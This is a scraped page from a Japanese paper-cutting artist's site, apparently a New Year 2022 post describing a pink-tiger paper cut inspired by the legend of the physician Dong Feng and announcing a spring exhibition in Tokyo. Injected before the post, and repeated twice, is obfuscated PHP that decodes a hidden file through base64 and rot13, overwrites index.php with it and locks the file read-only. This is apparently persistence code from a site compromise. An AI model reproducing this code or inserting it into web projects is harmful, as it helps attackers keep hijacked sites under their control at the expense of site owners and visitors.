$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 1月, 2022 | Note | MOCHIME PAPER CUTTING Official Website
2022年1月

Happy new year 2022

2022年01月02日-Paper Cutting 切り絵

OLYMPUS DIGITAL CAMERA
「騎虎童子」切り絵 黒谷和紙、洋紙、墨、水彩
今年はピンクの虎が脳裏にやって来たので白虎ではなく桃虎です。
童子が手にしているのは杏の生る枝。三国時代の医師 董奉の杏林には杏を守る虎がいたという説話から着想を得て描きました。(杏仁豆腐の発祥とも)
虎の額には王の字、童子の腰にはふくべ。中身は薬酒か若水か。この子はきっと仙童でしょう。董奉の童心かもしれません。皆様の健康を願い、彫りました。

今年は春に久々の東京での展示です。グループ展に参加します。
ウェブサイトの他にインスタグラム等のSNSでも随時情報発信していきます。

作品をご覧いただける日を、お目にかかれることを楽しみにしています。
よい一年になりますように。